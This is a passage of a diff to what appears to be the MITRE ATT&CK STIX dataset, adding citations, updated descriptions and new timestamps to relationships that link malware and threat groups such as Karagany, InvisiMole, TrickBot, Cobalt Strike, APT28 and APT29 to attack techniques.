Against Energy Suppliers. Retrieved April 8, 2016.", "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "relationship_type": "uses", "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "type": "relationship", - "modified": "2020-03-17T15:08:58.194Z", + "modified": "2020-10-14T22:38:11.536Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -44938,7 +49937,7 @@ { "id": "relationship--57e1f6b0-7fbd-49b4-8f5d-876b759437ac", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create a link to itself in the Startup folder to automatically start itself upon system restart.(Citation: Symantec Dragonfly)", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create a link to itself in the Startup folder to automatically start itself upon system restart.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -44947,13 +49946,18 @@ "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "relationship_type": "uses", "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "type": "relationship", - "modified": "2020-03-17T15:08:58.216Z", + "modified": "2020-08-13T14:05:44.954Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -45106,7 +50110,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "type": "relationship", @@ -48467,7 +53471,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "type": "relationship", @@ -48923,15 +53927,16 @@ ], "external_references": [ { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "type": "relationship", - "modified": "2020-03-17T02:22:39.550Z", + "modified": "2020-09-02T18:46:32.600Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -49339,27 +54344,32 @@ { "id": "relationship--97ea3b82-58ba-4a3e-8e6d-367755f83fa6", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": " [FIN6](https://attack.mitre.org/groups/G0037) has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019) ", + "description": " [FIN6](https://attack.mitre.org/groups/G0037) has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "FireEye FIN6 April 2016", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", - "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + "source_name": "FireEye FIN6 April 2016" }, { - "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", - "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019." + "source_name": "FireEye FIN6 Apr 2019" + }, + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" } ], "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", "relationship_type": "uses", "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "type": "relationship", - "modified": "2020-03-17T18:57:26.387Z", + "modified": "2020-09-09T15:53:09.648Z", "created": "2017-05-31T21:33:27.071Z" }, { @@ -50472,22 +55482,27 @@ { "id": "relationship--9e8f8dce-1921-4738-ae7f-30290a350cf2", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) avoids analysis by encrypting all strings, internal files, configuration data.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "type": "relationship", - "modified": "2020-03-17T00:09:25.958Z", + "modified": "2020-08-17T14:08:26.361Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -51344,7 +56359,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "type": "relationship", @@ -52372,7 +57387,7 @@ { "id": "relationship--e882b88e-7731-4bee-a644-c02f9aff2306", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[TrickBot](https://attack.mitre.org/software/S0266) uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.(Citation: S2 Grupo TrickBot June 2017)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.(Citation: S2 Grupo TrickBot June 2017)(Citation: Cyberreason Anchor December 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -52381,13 +57396,18 @@ "source_name": "S2 Grupo TrickBot June 2017", "description": "Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.", "url": "https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "relationship_type": "uses", "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "type": "relationship", - "modified": "2020-03-17T02:42:10.721Z", + "modified": "2020-09-11T13:27:44.523Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -53003,14 +58023,19 @@ "target_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "external_references": [ { - "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf", + "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", - "source_name": "Symantec Dragonfly" + "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], - "description": "(Citation: Symantec Dragonfly)", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)", "type": "relationship", - "modified": "2019-03-22T20:11:04.779Z", + "modified": "2020-08-13T15:49:32.782Z", "created": "2017-05-31T21:33:27.070Z" }, { @@ -53321,15 +58346,20 @@ "description": "Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.", "url": "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "source_name": "Nccgroup Gh0st April 2018" + }, + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." } ], - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) can download files to the victim\u2019s machine.(Citation: Nccgroup Gh0st April 2018)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) can download files to the victim\u2019s machine.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)", "id": "relationship--33a382a9-ebb3-48d9-bb7e-394a27783668", "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", "relationship_type": "uses", "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "type": "relationship", - "modified": "2019-04-16T20:26:40.883Z", + "modified": "2020-07-15T19:28:00.768Z", "created": "2019-01-29T14:51:06.825Z" }, { @@ -53659,22 +58689,27 @@ { "id": "relationship--d2067a75-0d5d-4899-9d9f-6537d98296c1", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can remotely activate the victim\u2019s webcam to capture content.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can remotely activate the victim\u2019s webcam to capture content.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "type": "relationship", - "modified": "2020-03-17T00:09:25.961Z", + "modified": "2020-07-16T15:07:27.171Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -53689,13 +58724,13 @@ "source_name": "Trend Micro Trickbot Nov 2018" } ], - "description": "[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence in the Startup folder.(Citation: Trend Micro Trickbot Nov 2018)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence by creating an autostart service that allows it to run whenever the machine boots.(Citation: Trend Micro Trickbot Nov 2018)", "id": "relationship--5235fbdb-5c53-4860-a459-cd4b538817db", "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "relationship_type": "uses", - "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "type": "relationship", - "modified": "2019-06-24T19:15:06.433Z", + "modified": "2020-09-14T19:25:41.222Z", "created": "2019-01-30T14:11:44.233Z" }, { @@ -53801,7 +58836,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091", "type": "relationship", @@ -55951,7 +60986,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "type": "relationship", - "modified": "2020-03-26T17:18:37.002Z", + "modified": "2020-09-16T16:02:16.980Z", "created": "2017-05-31T21:33:27.026Z" }, { @@ -56196,27 +61231,32 @@ { "id": "relationship--410f6714-cd02-4253-b324-a8ac15e70bca", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing emails with an attachment to deliver files with exploits to initial victims.(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)", + "description": "[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing emails with an attachment to deliver files with exploits to initial victims.(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" }, { - "source_name": "FireEye APT29 Nov 2018", + "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.", "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018." + "source_name": "FireEye APT29 Nov 2018" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", "relationship_type": "uses", "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "type": "relationship", - "modified": "2019-07-25T14:25:53.206Z", + "modified": "2020-10-09T16:07:58.988Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -56256,27 +61296,32 @@ { "id": "relationship--cb69217e-f063-4093-bcf0-f051ecd42e25", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[APT28](https://attack.mitre.org/groups/G0007) deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials.(Citation: FireEye APT28)(Citation: FireEye APT28 Hospitality Aug 2017)", + "description": "[APT28](https://attack.mitre.org/groups/G0007) deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials.(Citation: FireEye APT28)(Citation: FireEye APT28 Hospitality Aug 2017) [APT28](https://attack.mitre.org/groups/G0007) close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.(Citation: US District Court Indictment GRU Oct 2018)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "source_name": "FireEye APT28", "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", - "source_name": "FireEye APT28" + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" }, { "url": "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "description": "Smith, L. and Read, B.. (2017, August 11). APT28 Targets Hospitality Sector, Presents Threat to Travelers. Retrieved August 17, 2017.", "source_name": "FireEye APT28 Hospitality Aug 2017" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." } ], "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", "relationship_type": "uses", "target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "type": "relationship", - "modified": "2019-09-18T15:14:12.737Z", + "modified": "2020-10-06T19:05:06.828Z", "created": "2018-01-16T16:13:52.465Z" }, { @@ -56806,7 +61851,7 @@ { "id": "relationship--3afd226c-934f-44fd-8194-9a6dee5cba59", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses multiple types of encryption and encoding in its malware files, including AES, Caracachs, RC4, basic XOR with constant 0xA7, and other techniques.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster RATs)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: TrendMicro macOS Dacls May 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -56822,21 +61867,26 @@ "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" }, { - "source_name": "Novetta Blockbuster RATs", + "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.", - "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf" + "source_name": "Novetta Blockbuster RATs" }, { - "source_name": "McAfee Lazarus Resurfaces Feb 2018", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", - "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/" + "source_name": "McAfee Lazarus Resurfaces Feb 2018" + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "type": "relationship", - "modified": "2019-12-20T14:28:39.161Z", + "modified": "2020-08-10T15:05:31.283Z", "created": "2017-05-31T21:33:27.065Z" }, { @@ -56912,7 +61962,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "type": "relationship", - "modified": "2020-02-21T16:31:32.997Z", + "modified": "2020-09-16T15:27:01.558Z", "created": "2017-05-31T21:33:27.025Z" }, { @@ -57072,22 +62122,27 @@ { "id": "relationship--1f06f614-8f5a-4666-9fa5-fcda1535f97d", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has a command to delete a file and deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has deleted files and directories including XML and files successfully uploaded to C2 servers.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "type": "relationship", - "modified": "2020-03-17T00:09:26.036Z", + "modified": "2020-07-17T20:31:44.965Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -57104,7 +62159,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "type": "relationship", @@ -57553,7 +62608,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", "type": "relationship", @@ -58110,7 +63165,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "type": "relationship", @@ -59611,7 +64666,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "type": "relationship", - "modified": "2020-03-15T00:59:10.350Z", + "modified": "2020-10-07T18:10:06.580Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -60007,16 +65062,16 @@ ], "external_references": [ { - "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", "source_name": "RATANKBA", - "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ratankba-watering-holes-against-enterprises/" + "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", "type": "relationship", - "modified": "2019-05-03T16:54:33.101Z", + "modified": "2020-09-02T18:46:32.671Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -60326,7 +65381,7 @@ { "id": "relationship--d9e8d70a-06f6-4873-baf8-29ebfaf6bf99", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[MiniDuke](https://attack.mitre.org/software/S0051) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)", + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -60335,13 +65390,18 @@ "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", "relationship_type": "uses", "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "type": "relationship", - "modified": "2020-03-17T01:51:01.149Z", + "modified": "2020-10-09T16:07:59.027Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -60697,7 +65757,7 @@ { "id": "relationship--1b51b49a-1f3a-4b5d-aea3-989e9ccb72ad", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual)(Citation: Cyberreason Anchor December 2019) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -60707,6 +65767,11 @@ "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.", "source_name": "cobaltstrike manual" }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + }, { "url": "https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf", "description": 